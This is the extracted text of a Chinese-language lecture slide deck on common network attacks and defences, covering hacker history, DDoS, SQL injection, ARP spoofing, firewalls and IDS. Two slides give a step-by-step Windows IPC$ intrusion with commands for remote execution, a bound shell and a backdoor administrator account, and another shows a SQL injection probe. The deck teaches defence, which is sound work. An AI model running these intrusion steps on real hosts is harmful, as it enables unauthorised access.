网络攻击的常见手段与防范措施.ppt

单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,*,*,网络攻击的常见手段 与防范措施,1,01,什么是网络安全？,02,网络安全的主要特性,目,录,一、计算机网络安全的概念,2,什么是网络安全？,网络安全：,网络安全是指网络系统的硬件、软件及其系统中的数据受到保护，不因偶然的或者恶意的原因而遭受到破坏、更改、泄露，系统连续可靠正常地运行，网络服务不中断。,3,网络安全的主要特性,保密性,信息不泄露给非授权用户、实体或过程，或供其利用的特性。,完整性,数据未经授权不能进行改变的特性。即信息在存储或传输过程中保持不被修改、不被破坏和丢失的特性。,可用性,可被授权实体访问并按需求使用的特性。即当需要时能否存取所需的信息。例如网络环境下拒绝服务、破坏网络和有关系统的正常运行等都属于对可用性的攻击；,可控性,对信息的传播及内容具有控制能力。,可审查性,出现安全问题时提供依据与手段,4,01,入侵技术的历史和发展,02,一般攻击步骤,03,攻击实例与攻击方式,目,录,二、常见的网络攻击,5,黑客,黑客是程序员，掌握操作系统和编程语言方面的知识，乐于探索可编程系统的细节，并且不断提高自身能力，知道系统中的漏洞及其原因所在。专业黑客都是很有才华的源代码创作者。,起源：,20,世纪,60,年代,目的：基于兴趣非法入侵,基于利益非法入侵,信息战,6,Kevin Mitnick,凯文米特尼克是世界上最著名的黑客之一，第一个被美国联邦调查局通缉的黑客。,1979年，15岁的米特尼克,和他的朋友侵入了北美空中防务指挥系统,。,7,莫里斯蠕虫,（,Morris Worm,）,时间,1988年,肇事者,罗伯特塔潘,莫里斯,美国康奈尔大学学生，其父是美国国家安全局安全专家,机理,利用sendmail,finger 等服务的漏洞，消耗CPU资源，拒绝服务,影响,Internet上大约6000台计算机感染，占当时Internet 联网主机总数的10%，造成9600万美元的损失,黑客从此真正变黑，黑客伦理失去约束，黑客传统开始中断。,8,2001,年中美黑客大战,事件背景和经过,中美军机南海,4.1,撞机事件为导火线,4,月初，以,PoizonB0 x,、,pr0phet,为代表的美国黑客组织对国内站点进行攻击，约,300,个左右的站点页面被修改,4,月下旬，国内红（黑）客组织或个人，开始对美国网站进行小规模的攻击行动，,4,月,26,日有人发表了“五一卫国网战”战前声明，宣布将在,5,月,1,日至,8,日，对美国网站进行大规模的攻击行动。,各方都得到第三方支援,各大媒体纷纷报道，评论，中旬结束大战,9,PoizonB0 x,、,pr0phet,更改的网页,中经网数据有限公司,中国科学院心理研究所,国内某政府网站,国内某大型商业网站,10,国内黑客组织更改的网站页面,美国劳工部网站,美国某节点网站,美国某大型商业网站,美国某政府网站,11,这次事件中采用的常用攻击手法,红客联盟负责人在,5,月,9,日网上记者新闻发布会上对此次攻击事件的技术背景说明如下：“我们更多的是一种不满情绪的发泄，大家也可以看到被攻破的都是一些小站，大部分都是,NT/Win2000,系统，这个行动在技术上是没有任何炫耀和炒作的价值的。”,主要采用当时流行的系统漏洞进行攻击,12,这次事件中被利用的典型漏洞,用户名泄漏，缺省安装的系统用户名和密码,Unicode,编码可穿越,firewall,执行黑客指令,ASP,源代码泄露可远程连接的数据库用户名和密码,SQL server,缺省安装,微软,Windows 2000,登录验证机制可被绕过,Bind,远程溢出，,Lion,蠕虫,SUN rpc.sadmind,远程溢出，,sadmin/IIS,蠕虫,Wu-Ftpd,格式字符串错误远程安全漏洞,拒绝服务,(syn-flood,ping),13,1980,1985,1990,1995,2000,密码猜测,可自动复制的代码,密码破解,利用已知的漏洞,破坏审计系统,后门,会话劫持,擦除痕迹,嗅探,包欺骗,GUI,远程控制,自动探测扫描,拒绝服务,www,攻击,工具,攻击者,入侵者水平,攻击手法,半开放隐蔽扫描,控制台入侵,检测网络管理,DDOS,攻击,2002,高,入侵技术的发展,14,01,入侵技术的历史和发展,02,一般攻击步骤,03,攻击实例与攻击方式,目,录,15,常见的攻击方法,端口扫描：网络攻击的前奏,网络监听：局域网、,HUB,、,ARP,欺骗、网关设备,邮件攻击：邮件炸弹、邮件欺骗,网页欺骗：伪造网址、,DNS,重定向,密码破解：字典破解、暴力破解、,md5,解密,漏洞攻击：溢出攻击、系统漏洞利用,种植木马：隐蔽、免杀、网站挂马、邮件挂马,DoS,、,DDoS,：拒绝服务攻击、分布式拒绝服务攻击,cc,攻击：借助大量代理或肉鸡访问最耗资源的网页,XSS,跨站攻击、,SQL,注入：利用变量检查不严格构造,javascript,语句挂马或获取用户信息，或构造,sql,语句猜测表、字段以及管理员账号密码,社会工程学：,QQ,数据库被盗,16,端口,判断,判断,系统,选择,最简,方式,入侵,分析,可能,有漏,洞的,服务,获取,系统,一定,权限,提,升,为,最,高,权,限,安装,多个,系统,后门,清除,入侵,脚印,攻击其,他系统,获取敏,感信息,作为其,他用途,常见的系统入侵步骤,17,IP,地址、主机是否运行、到要入侵点的路由、主机操作系统与用户信息等。,攻击步骤,1.,收集主机信息,Ping,命令判断计算机是否开着，或者数据包发送到返回需要多少时间,Tracert/Tracerout,命令跟踪从一台计算机到另外一台计算机所走的路径,Finger,和,Rusers,命令收集用户信息,Host,或者,Nslookup,命令，结合,Whois,和,Finger,命令获取主机、操作系统和用户等信息,应用的方法：,18,19,获取网络服务的端口作为入侵通道。,2.,端口扫描,1.TCP Connect()2.TCP SYN,3.TCP FIN4.IP,段扫瞄,5.TCP,反向,Ident,扫瞄,6.FTP,代理扫瞄,7.UDP ICMP,不到达扫瞄,7,种扫瞄类型：,20,3,、系统漏洞利用,一次利用,ipc$,的入侵过程,1.C:net use x.x.x.xIPC$“”/user:“admintitrator”,用,“,流光,”,扫的用户名是,administrator,，密码为“空”的,IP,地址,2.C:copy srv.exe x.x.x.xadmin$,先复制,srv.exe,上去，在流光的,Tools,目录下,3.C:net time x.x.x.x,查查时间，发现,x.x.x.x,的当前时间是,2003/3/19,上午,11:00,，命令成功完成。,4.C:at x.x.x.x 11:05 srv.exe,用,at,命令启动,srv.exe,吧（这里设置的时间要比主机时间推后）,5.C:net time x.x.x.x,再查查时间到了没有，如果,x.x.x.x,的当前时间是,2003/3/19,上午,11:05,，那就准备开始下面的命令。,21,6.C:telnet x.x.x.x 99,这里会用到,Telnet,命令吧，注意端口是,99,。,Telnet,默认的是,23,端口，但是我们使用的是,SRV,在对方计算机中为我们建立一个,99,端口的,Shell,。虽然我们可以,Telnet,上去了，但是,SRV,是一次性的，下次登录还要再激活！所以我们打算建立一个,Telnet,服务！这就要用到,ntlm,了,7.C:copy ntlm.exe 127.0.0.1admin$ntlm.exe,也在,流光,的,Tools,目录中,8.C:WINNTsystem32ntlm,输入,ntlm,启动（这里的,C:WINNTsystem32,是在对方计算机上运行当出现“,DONE”,的时候，就说明已经启动正常。然后使用“,net start telnet”,来开启,Telnet,服务,),9.Telnet x.x.x.x,，接着输入用户名与密码就进入对方了,10.C:net user guest/active:yes,为了方便日后登陆,将,guest,激活并加到管理组,11.C:net user guest 1234,将,Guest,的密码改为,1234,12.C:net localgroup administrators guest/add,将,Guest,变为,Administrator,22,01,入侵技术的历史和发展,02,一般攻击步骤,03,攻击实例与攻击方式,目,录,23,北京时间10月22日凌晨，美国域名服务器管理服务供应商Dyn宣布，该公司在当地时间周五早上遭遇了DDoS（分布式拒绝服务）攻击，从而导致许多网站在美国东海岸地区宕机，,Twitter、Tumblr、Netflix、亚马逊、Shopify、Reddit、Airbnb、PayPal和Yelp等诸多人气网站无一幸免,。Dyn称，攻击由感染恶意代码的设备发起，来自全球上千万IP地址，几百万恶意攻击的源头是物联网联系的所谓“智能”家居产品。,1,、DDoS（分布式拒绝服务）攻击,24,攻击现象,被攻击主机上有大量等待的TCP连接；,网络中充斥着大量的无用的数据包；,源地址为假 制造高流量无用数据，造成网络拥塞，使受害主机无法正常和外界通讯；,利用受害主机提供的传输协议上的缺陷反复高速的发出特定的服务请求，使主机无法处理所有正常请求；,严重时会造成系统死机。,分布式拒绝服务攻击,：借助于C/S（客户/服务器）技术，将多个计算机联合起来作为攻击平台，对一个或多个目标发动DDoS攻击，从而成倍地提高拒绝服务攻击的威力,25,分布式拒绝服务攻击,攻击流程,1,、搜集资料，被攻击目标主机数目、地址情况，目标主机的配置、性能，目标的宽带。,2,、是占领和控制网络状态好、性能好、安全管理水平差的主机做傀儡机。,3,、攻击者在客户端通过,telnet,之类的常用连接软件，向主控端发送发送对目标主机的攻击请求命令。主控端侦听接收攻击命令，并把攻击命令传到分布端，分布端是执行攻击的角色，收到命令立即发起,flood,攻击。,26,主机设置,所有的主机平台都有抵御DoS的设置，基本的有：,1,、关闭不必要的服务,2,、限制同时打开的Syn半连接数目,3,、缩短Syn半连接的time out 时间,4,、及时更新系统补丁,网络设置,1.防火墙,禁止对主机的非开放服务的访问 限制同时打开的SYN最大连接数 限制特定IP地址的访问 启用防火墙的防DDoS的属性 严格限制对外开放的服务器的向外访问 第五项主要是防止自己的服务器被当做工具去害人。,2.路由器,设置SYN数据包流量速率 升级版本过低的ISO 为路由器建立log server,防范措施,27,雅虎作为美国著名的互联网门户网站，也是20世纪末互联网奇迹的创造者之一。然而在2013年8月20日，中国雅虎邮箱宣布停止提供服务。就在大家已快将其淡忘的时候，雅虎公司突然对外发布消息，承认在2014年的一次黑客袭击中，至少5亿用户的数据信息遭窃。此次事件成为了有史以来规模最大的单一网站信息泄露事件。,2,、,SQL,注入攻击,28,攻击方法,SQL,注入主要是由于网页制作者对输入数据检查不严格，攻击者通过对输入数据的改编来实现对数据库的访问，从而猜测出管理员账号和密码,；,如,and user=admin,；,如果页面显示正常，说明数据库表中有一个,user,字段，且其中有,admin,这个值,；,通过,SQL,注入攻击可以探测网站后台管理员账号和密码,。,SQL注入,：就是通过把SQL命令插入到Web表单提交或输入域名或页面请求的查询字符串，最终达到欺骗服务器执行恶意的SQL命令。具体来说，它是利用现有应用程序，将（恶意）的SQL命令注入到后台数据库引擎执行的能力，它可以通过在Web表单中输入（恶意）SQL语句得到一个存在安全漏洞的网站上的数据库，而不是按照设计者意图去执行SQL语句。,29,利用探测出的管理员账号和密码登陆网站后台，在拥有附件上传的功能模块中尝试上传网页木马或一句话木马（一般利用数据库备份和恢复功能）,；,通过网页木马探测,IIS,服务器配置漏洞，找到突破点提升权限，上传文件木马并在远程服务器上运行,；,通过连接木马彻底拿到系统控制权,；,因此，,SQL,注入只是网站入侵的前奏，就算注入成功也不一定可以拿到,web shell,或,root,。,30,1,、输入验证,检查用户输入的合法性，确信输入的内容只包含合法的数据。,2,、错误消息处理,防范SQL注入，还要避免出现一些详细的错误消息，因为黑客们可以利用这些消息。要使用一种标准的输入确认机制来验证所有的输入数据的长度、类型、语句、企业规则等。,3,、加密处理,将用户登录名称、密码等数据加密保存。,4,、存储过程来执行所有的查询,SQL参数的传递方式将防止攻击者利用单引号和连字符实施攻击。此外，它还使得数据库权限可以限制到只允许特定的存储过程执行，所有的用户输入必须遵从被调用的存储过程的安全上下文，这样就很难再发生注入式攻击了。,5,、使用专业的漏洞扫描工具,6,、确保数据库安全,7,、安全审评,防范措施,31,3,、,ARP攻击,ARP（Address Resolution Protocol，地址解析协议）是根据IP地址获取物理地址的一个TCP/IP协议。,ARP攻击就是通过伪造IP地址和MAC地址实现ARP欺骗，能够在网络中产生大量的ARP通信量使网络阻塞，攻击者只要持续不断的发出伪造的ARP响应包就能更改目标主机ARP缓存中的IP-MAC条目，造成网络中断或中间人攻击。,ARP攻击仅能在局域网内进行。,ARP请求包是以广播的形式发出，正常情况下只有正确IP地址的主机才会发出ARP响应包，告知查询主机自己的MAC地址。,局域网中每台主机都维护着一张ARP表，其中存放着地址对。,32,ARP,改向的中间人窃听,A,发往,B,：,(MACb,，,MACa,，,PROTOCOL,，,DATA),B,发往,A,：,(MACa,，,MACb,，,PROTOCOL,，,DATA),A,发往,B,：,(MACx,，,MACa,，,PROTOCOL,，,DATA),B,发往,A,：,(MACx,，,MACb,，,PROTOCOL,，,DATA),33,原理：,X,分别向,A,和,B,发送,ARP,包，促使其修改,ARP,表,主机,A,的,ARP,表中,B,为,主机,B,的,ARP,表中,A,为,X,成为主机,A,和主机,B,之间的“中间人”，可以选择被动地监测流量，获取密码和其他涉密信息，也可以伪造数据，改变电脑A和电脑B之间的通信内容。,防范措施：,网关和终端双向绑定IP和MAC地址。,局域网中的每台电脑中,进行,静态ARP绑定,。,打开安全防护软件的ARP防火墙功能,。,彻底追踪查杀ARP病毒,。,34,01,常见的安全防范措施,目,录,三、安全防范措施,35,常用的安全防范措施,物理层,网络层,路由交换策略,VLAN,划分,防火墙、隔离网闸,入侵检测,抗拒绝服务,传输加密,系统层,漏洞扫描,系统安全加固,SUS,补丁安全管理,应用层,防病毒,安全功能增强,管理层,独立的管理队伍,统一的管理策略,36,如果将我们内部网络比作城堡,防火墙就是城堡的城门或护城河,-,只允许己方的队伍通过。,防病毒产品就是城堡中的将士,-,想法设法把发现的敌人消灭。,入侵检测系统就是城堡中的瞭望哨,-,监视有无敌方或其他误入城堡的人出现。,漏洞检测就是巡逻,-,检查城堡是否坚固以及是否存在隐患。,VPN,就是城堡的安全密道,-,当城堡周围遍布敌军时可做内外联络。,37,访问控制,认证,NAT,加密,防病毒、内容过滤,流量管理,常用的安全防护措施防火墙,38,入侵检测系统,Firewall,Internet,Servers,DMZ,IDS Agent,Intranet,监控中心,router,攻击者,发现攻击,发现攻击,发现攻击,报警,报警,IDS Agent,39,漏洞扫描系统,Internet,地方网管,scanner,监控中心,地方网管,地方网管,地方网管,地方网管,40,市场部,工程部,router,开发部,Internet,Servers,Firewall,漏洞扫描产品应用,41,安全建议：,备份重要资料。,及时更新操作系统，时刻留意软件制造商发布的各种补丁，并及时安装应用。,安装杀毒软件，并让它每天更新升级。,拒绝绝点击可疑电子邮件和链接。,不使用过于简单的密码，并定期更改。,保证wifi连接的安全。,42,THANK YOU,43,